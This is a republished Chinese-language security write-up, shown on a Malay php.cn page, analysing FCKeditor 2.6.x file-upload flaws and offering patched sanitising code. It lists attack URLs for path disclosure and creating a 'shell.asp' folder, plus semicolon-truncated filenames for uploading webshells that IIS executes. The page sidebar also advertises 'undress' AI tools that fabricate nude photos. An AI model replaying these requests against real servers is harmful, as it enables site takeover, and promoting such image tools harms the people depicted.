Rumah php教程 php手册 Fckeditor PHP/ASP File Upload Vul

Fckeditor PHP/ASP File Upload Vul

Jun 06, 2016 pm 07:48 PM
asp file php

目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特

目录

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考
Salin selepas log masuk

 

1. 漏洞描述

FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多WEB项目和大型网站均采用了FCKeditor
它可和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合
FCK中一个很重要的文件上传的功能,常常被黑客用来进行GETSHELL攻击,根本原因是因为角色权限控制不严、以及文件扩展名限制逻辑存在BYPASS缺陷

Relevant Link:

http:<span>//</span><span>sebug.net/vuldb/ssvid-20830</span>
Salin selepas log masuk


2. 漏洞触发条件

0x1: 信息搜集

首先收集FCK的版本信息

http:<span>//</span><span>localhost/fckeditor/editor/dialog/fck_about.html</span><span>
/*</span><span>
version 
2.6.8
Build 25427
</span><span>*/</span>
Salin selepas log masuk

0x2: 获取上传点路径

<span>爆物理路径
http:</span><span>//</span><span>172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp</span>

<span>1</span><span>. 爆路径漏洞
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp</span>

<span>2</span><span>. 列目录漏洞也可助找上传地址
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp</span>
<span>
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F</span>

<span>3</span><span>. 其他上传地址
http:</span><span>//</span><span>192.168.174.138/fckeditor/_samples/default.html</span>
http:<span>//</span><span>192.168.174.138/fckeditor/_samples/asp/sample01.asp</span>
http:<span>//</span><span>192.168.174.138/fckeditor/_samples/asp/sample02.asp</span>
http:<span>//</span><span>192.168.174.138/fckeditor/_samples/asp/sample03.asp</span>
http:<span>//</span><span>192.168.174.138/fckeditor/_samples/asp/sample04.asp</span>
<span>一般很多站点都已删除_samples目录,可以试试。
FCKeditor</span>/editor/<span>fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/fckeditor.html</span>

<span>4</span><span>. 常用上传地址
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/</span>
http:<span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp</span>
http:<span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=</span><span>http://www.site.com</span><span>%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  </span>

<span>5</span><span>. FCKeditor 中test 文件的上传地址
http:</span><span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html</span>
http:<span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/upload/test.html</span>
http:<span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/connectors/test.html</span>
http:<span>//</span><span>192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html </span>
Salin selepas log masuk

最终获得的上传点如下

http:<span>//</span><span>localhost/fckeditor/editor/filemanager/connectors/test.html</span>
http:<span>//</span><span>localhost/fckeditor/editor/filemanager/connectors/uploadtest.html</span>
Salin selepas log masuk

0x3: 建立新文件夹

http:<span>//</span><span>localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
</span><span>//</span><span>在images文件夹下建立文件夹 </span>
Salin selepas log masuk

0x4: IIS解析漏洞

如果你的文件处在一个xx.asp文件夹下,那这个文件夹下的所有文件都会被当作.asp脚本来执行,这是利用了IIS的xx.asp文件夹解析漏洞

<span>1</span>. 建立一个文件夹/z/<span>shell.asp
http:</span><span>//</span><span>localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 </span>
http:<span>//</span><span>localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp</span>

<span>2</span><span>. 上传一个内容为WEBSHELL的xx.jpg文件
http:</span><span>//</span><span>localhost/userfiles/image/shell.asp/z/choop.jpg</span>
http:<span>//</span><span>localhost/userfiles/image/shell.asp/z/choop.jpg
</span><span>//</span><span>这个xx.jpg会被当作webshell解析</span>
Salin selepas log masuk

0x5: FCK扩展名过滤防御解析漏洞

正常情况下,fck对上传的文件后缀扩展名是有防御逻辑的(即禁止上传脚本文件)

<span>1</span><span>. 上传文件名: shell.php;.jpg
文件会被重命名为: shell_php.jpg

</span><span>2</span><span>. 如果上传文件名: 
    </span><span>1</span><span>) a.php;a_jpg
    </span><span>2</span><span>) a.asp;a_jpg
则文件不会被重命名
 
</span><span>3</span>. 又因为IIS存在一个解析漏洞,分号<span>"</span><span>;</span><span>"</span><span>后面的字符串会被IIS截断,导致黑客上传的文件对IIS来说就是
a.php
a.asp
从而得到执行</span>
Salin selepas log masuk

Relevant Link:

http:<span>//</span><span>hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597</span>
Salin selepas log masuk


3. 漏洞影响范围

2.6.xx


4. 漏洞代码分析

FCKEditor上传检测,是通过黑色单/白名单的方式检测允许和不允许上传的文件类型,具体的实现逻辑位于

<span>1</span><span>. asp: \fckeditor\editor\filemanager\connectors\asp
</span><span>2</span>. php: \fckeditor\editor\filemanager\connectors\php
Salin selepas log masuk

0x1: ASP

\fckeditor\editor\filemanager\connectors\asp\class_upload.asp

<span>Private Function IsAllowed(sExt)
        Dim oRE
        Set oRE    </span>=<span> New RegExp
        oRE.IgnoreCase    </span>=<span> True
        oRE.Global        </span>=<span> True

        If sDenied </span>= <span>""</span><span> Then
            oRE.Pattern    </span>=<span> sAllowed
            IsAllowed    </span>= (sAllowed = <span>""</span><span>) Or oRE.Test(sExt)
        Else
            oRE.Pattern    </span>=<span> sDenied
            IsAllowed    </span>=<span> Not oRE.Test(sExt)
        End If

        Set oRE    </span>=<span> Nothing
End Function</span>
Salin selepas log masuk

\fckeditor\editor\filemanager\connectors\asp\io.asp

<span>Function IsAllowedExt( extension, resourceType )
    Dim oRE
    Set oRE    </span>=<span> New RegExp
    oRE.IgnoreCase    </span>=<span> True
    oRE.Global        </span>=<span> True

    Dim sAllowed, sDenied
    sAllowed    </span>=<span> ConfigAllowedExtensions.Item( resourceType )
    sDenied        </span>=<span> ConfigDeniedExtensions.Item( resourceType )

    IsAllowedExt </span>=<span> True

    If sDenied </span> <span>""</span><span> Then
        oRE.Pattern    </span>=<span> sDenied
        IsAllowedExt    </span>=<span> Not oRE.Test( extension )
    End If

    If IsAllowedExt And sAllowed </span> <span>""</span><span> Then
        oRE.Pattern        </span>=<span> sAllowed
        IsAllowedExt    </span>=<span> oRE.Test( extension )
    End If

    Set oRE    </span>=<span> Nothing
End Function</span>
Salin selepas log masuk

待检测的extension是来自FCK的配置文件:config.asp
\fckeditor\editor\filemanager\connectors\asp\config.asp

ConfigAllowedExtensions.Add    <span>"</span><span>File</span><span>"</span>, <span>"</span><span>7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip</span><span>"</span><span>

ConfigAllowedExtensions.Add    </span><span>"</span><span>Image</span><span>"</span>, <span>"</span><span>bmp|gif|jpeg|jpg|png</span><span>"</span><span>

ConfigAllowedExtensions.Add    </span><span>"</span><span>Flash</span><span>"</span>, <span>"</span><span>swf|flv</span><span>"</span><span>

ConfigAllowedExtensions.Add    </span><span>"</span><span>Media</span><span>"</span>, <span>"</span><span>aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv</span><span>"</span>
Salin selepas log masuk

这只是提供给FCK的正则判断逻辑,真正的重命名机制在这里
\fckeditor\editor\filemanager\connectors\asp\io.asp

<span>'</span><span> Do a cleanup of the file name to avoid possible problems</span>
<span>function SanitizeFileName( sNewFileName )
    Dim oRegex
    Set oRegex </span>=<span> New RegExp
    oRegex.Global        </span>=<span> True

    </span><span>if</span> ( ConfigForceSingleExtension =<span> True ) then
        </span><span>/*</span><span>
        这就是重命名文件名的关键逻辑了
        从第一个遇到"."号开始搜索,并把后面的内容当作捕获分组,捕获分组的过滤条件是不会再在后面遇到一个"."号 了,并设置一个断言,断言的内容为捕获分组的内容不可能发生,即如果还在后面遇到了一个"."号,则这个正则判断成立,即搜索到第一次遇到的"."号。然后进行replace操作,把"."号替换成"_"
        1. 如果我们的文件名是: asp.asp;asp.jpg,自然会被正则捕获到,第一个"."号就被替换成了"_"
        2. 如果我们的文件名是: asp.asp;jpg,这种文件名也能通过文件后缀判断逻辑,即bypass
        </span><span>*/</span><span>
        oRegex.Pattern </span>= <span>"</span><span>\.(?![^.]*$)</span><span>"</span><span>
        sNewFileName </span>= oRegex.Replace( sNewFileName, <span>"</span><span>_</span><span>"</span><span> )
    end </span><span>if</span>

<span>'</span><span> remove \ / | : ? *  "  and control characters</span>
    oRegex.Pattern = <span>"</span><span>(\\|\/|\||:|\?|\*|</span><span>""</span><span>|\|[\u0000-\u001F]|\u007F)</span><span>"</span><span>
    SanitizeFileName </span>= oRegex.Replace( sNewFileName, <span>"</span><span>_</span><span>"</span><span> )

    Set oRegex </span>=<span> Nothing
end function</span>
Salin selepas log masuk


5. 防御方法

1. ASP

0x1:  删除fckeditor下含test的html文件

<span>1</span>. \editor\filemanager\connectors\test.html
Salin selepas log masuk

0x2: 在代码层防御IIS解析漏洞(分号截断)

\fckeditor\editor\filemanager\connectors\asp\io.asp

<span>'</span><span> Do a cleanup of the file name to avoid possible problems</span>
<span>function SanitizeFileName( sNewFileName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 </span>=<span> New RegExp
    Set oRegexSecurityExt     </span>=<span> New RegExp
    oRegex.Global                    </span>=<span> True
    oRegexSecurityExt.Global        </span>=<span> True

    </span><span>if</span> ( ConfigForceSingleExtension =<span> True ) then
        oRegex.Pattern </span>= <span>"</span><span>\.(?![^.]*$)</span><span>"</span><span>
        <span>SanitizeFileName</span> </span>= oRegex.Replace( sNewFileName, <span>"</span><span>_</span><span>"</span><span> )

        oRegexSecurityExt.Pattern </span>= <span>"</span><span>\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)</span><span>"</span><span>
        <span>SanitizeFileName</span> </span>= oRegexSecurityExt.Replace( <span>sNewFileName</span>, <span>"</span><span>_</span><span>"</span><span> )
    end </span><span>if</span>

<span>'</span><span> remove \ / | : ? *  "  and control characters</span>
    oRegex.Pattern = <span>"</span><span>(\\|\/|\||:|\;|\?|\*|</span><span>""</span><span>|\|[\u0000-\u001F]|\u007F)</span><span>"</span><span>
    SanitizeFileName </span>= oRegex.Replace( sNewFileName, <span>"</span><span>_</span><span>"</span><span> )

    Set oRegex </span>=<span> Nothing
end function</span>
Salin selepas log masuk

0x3: 在代码层防御IIS解析漏洞(创建xx.asp目录)
如果黑客通过FCK的目录创建接口创建了一个xx.asp目录,IIS将此目录下的的任意文件都当作asp脚本进行解析,攻击者可以向这个目录下上传包含WEBSHELL的jpg文件

<span>'</span><span> Do a cleanup of the folder name to avoid possible problems</span>
<span>function SanitizeFolderName( sNewFolderName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 </span>=<span> New RegExp
    Set oRegexSecurityExt     </span>=<span> New RegExp
    oRegex.Global                    </span>=<span> True
    oRegexSecurityExt.Global        </span>=<span> True

    </span><span>'</span><span>remove . \ / | : ? *  "  and control characters</span>
    oRegex.Pattern = <span>"</span><span>(\.|\\|\/|\||:|\?|\;|\*|</span><span>""</span><span>|\|[\u0000-\u001F]|\u007F)</span><span>"</span><span>
    SanitizeFolderName </span>= oRegex.Replace( sNewFolderName, <span>"</span><span>_</span><span>"</span><span> )

    </span><span>'</span><span>forbidden the dangerous ext</span>
    oRegexSecurityExt.Pattern = <span>"</span><span>\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$</span><span>"</span><span>
    SanitizeFolderName </span>= oRegexSecurityExt.Replace( sNewFolderName, <span>"</span><span>_</span><span>"</span><span> )

    Set oRegex </span>=<span> Nothing
end function</span>
Salin selepas log masuk

0x4: 扩展名上传限制正则绕过漏洞

和0x2: 在代码层防御IIS解析漏洞(分号截断)相同,同时还可以通过强化正则规则,在扩展名的头尾加上"起始"、"结束"定界符来规避攻击者的畸形后缀bypass

<span>Function IsAllowedType( resourceType )
    Dim oRE
    Set oRE    </span>=<span> New RegExp
    oRE.IgnoreCase    </span>=<span> False
    oRE.Global        </span>=<span> True
    oRE.Pattern        </span>= <span>"</span><span>^(</span><span>"</span> & ConfigAllowedTypes & <span>"</span><span>)$</span><span>"</span><span>

    IsAllowedType </span>=<span> oRE.Test( resourceType )

    Set oRE    </span>=<span> Nothing
End Function

Function IsAllowedCommand( sCommand )
    Dim oRE
    Set oRE    </span>=<span> New RegExp
    oRE.IgnoreCase    </span>=<span> True
    oRE.Global        </span>=<span> True
    oRE.Pattern        </span>= <span>"</span><span>^(</span><span>"</span> & ConfigAllowedCommands & <span>"</span><span>)$</span><span>"</span><span>

    IsAllowedCommand </span>=<span> oRE.Test( sCommand )

    Set oRE    </span>=<span> Nothing
End Function</span>
Salin selepas log masuk

Relevant Link:

http:<span>//</span><span>www.chinaz.com/news/2012/1205/284700.shtml</span>
http:<span>//</span><span>www.sdlunzhong.cn/itres/showitnews.aspx?id=807</span>
Salin selepas log masuk

2. PHP

存在IIS+FastCGI即同时存在ASP、PHP的运行环境

/fckeditor/editor/filemanager/connectors/php/io.php

<span>//</span><span> Do a cleanup of the folder name to avoid possible problems</span>
<span>function SanitizeFolderName( $sNewFolderName )
{
    $sNewFolderName </span>=<span> stripslashes( $sNewFolderName ) ;

    </span><span>//</span><span> Remove . \ / | : ; . ? * " </span>
    $sNewFolderName = preg_replace( <span>'</span><span>/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"||[[:cntrl:]]/</span><span>'</span>, <span>'</span><span>_</span><span>'</span><span>, $sNewFolderName ) ;

    $sNewFolderName </span>= preg_replace( <span>'</span><span>/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i</span><span>'</span>, <span>'</span><span>_</span><span>'</span><span>, $sNewFolderName ) ;

    </span><span>return</span><span> $sNewFolderName ;
}

</span><span>//</span><span> Do a cleanup of the file name to avoid possible problems</span>
<span>function SanitizeFileName( $sNewFileName )
{
    </span><span>global</span><span> $Config ;

    $sNewFileName </span>=<span> stripslashes( $sNewFileName ) ;

    </span><span>//</span><span> Replace dots in the name with underscores (only one dot can be there... security issue).</span>
    <span>if</span> ( $Config[<span>'</span><span>ForceSingleExtension</span><span>'</span><span>] )
        $sNewFileName </span>= preg_replace( <span>'</span><span>/\\.(?![^.]*$)/</span><span>'</span>, <span>'</span><span>_</span><span>'</span><span>, $sNewFileName ) ;

    </span><span>//</span><span> Remove \ / | : ? * " </span>
    $sNewFileName = preg_replace( <span>'</span><span>/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"||[[:cntrl:]]/</span><span>'</span>, <span>'</span><span>_</span><span>'</span><span>, $sNewFileName ) ;

    $sNewFileName </span>= preg_replace( <span>'</span><span>/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i</span><span>'</span>, <span>'</span><span>_</span><span>'</span><span>, $sNewFileName ) ;

    </span><span>return</span><span> $sNewFileName ;
}</span>
Salin selepas log masuk


6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved

 

Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

AI Hentai Generator

AI Hentai Generator

Menjana ai hentai secara percuma.

Artikel Panas

R.E.P.O. Kristal tenaga dijelaskan dan apa yang mereka lakukan (kristal kuning)
2 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Tetapan grafik terbaik
2 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Cara Memperbaiki Audio Jika anda tidak dapat mendengar sesiapa
2 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

Alat panas

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1

Hantar Studio 13.0.1

Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6

Dreamweaver CS6

Alat pembangunan web visual

SublimeText3 versi Mac

SublimeText3 versi Mac

Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Konfigurasi Projek CakePHP Konfigurasi Projek CakePHP Sep 10, 2024 pm 05:25 PM

Dalam bab ini, kita akan memahami Pembolehubah Persekitaran, Konfigurasi Umum, Konfigurasi Pangkalan Data dan Konfigurasi E-mel dalam CakePHP.

Panduan Pemasangan dan Naik Taraf PHP 8.4 untuk Ubuntu dan Debian Panduan Pemasangan dan Naik Taraf PHP 8.4 untuk Ubuntu dan Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 membawa beberapa ciri baharu, peningkatan keselamatan dan peningkatan prestasi dengan jumlah penamatan dan penyingkiran ciri yang sihat. Panduan ini menerangkan cara memasang PHP 8.4 atau naik taraf kepada PHP 8.4 pada Ubuntu, Debian, atau terbitan mereka

Tarikh dan Masa CakePHP Tarikh dan Masa CakePHP Sep 10, 2024 pm 05:27 PM

Untuk bekerja dengan tarikh dan masa dalam cakephp4, kami akan menggunakan kelas FrozenTime yang tersedia.

Muat naik Fail CakePHP Muat naik Fail CakePHP Sep 10, 2024 pm 05:27 PM

Untuk mengusahakan muat naik fail, kami akan menggunakan pembantu borang. Di sini, adalah contoh untuk muat naik fail.

Penghalaan CakePHP Penghalaan CakePHP Sep 10, 2024 pm 05:25 PM

Dalam bab ini, kita akan mempelajari topik berikut yang berkaitan dengan penghalaan ?

Bincangkan CakePHP Bincangkan CakePHP Sep 10, 2024 pm 05:28 PM

CakePHP ialah rangka kerja sumber terbuka untuk PHP. Ia bertujuan untuk menjadikan pembangunan, penggunaan dan penyelenggaraan aplikasi lebih mudah. CakePHP adalah berdasarkan seni bina seperti MVC yang berkuasa dan mudah difahami. Model, Pandangan dan Pengawal gu

Pengesah Mencipta CakePHP Pengesah Mencipta CakePHP Sep 10, 2024 pm 05:26 PM

Pengesah boleh dibuat dengan menambah dua baris berikut dalam pengawal.

CakePHP Bekerja dengan Pangkalan Data CakePHP Bekerja dengan Pangkalan Data Sep 10, 2024 pm 05:25 PM

Bekerja dengan pangkalan data dalam CakePHP adalah sangat mudah. Kami akan memahami operasi CRUD (Buat, Baca, Kemas Kini, Padam) dalam bab ini.

See all articles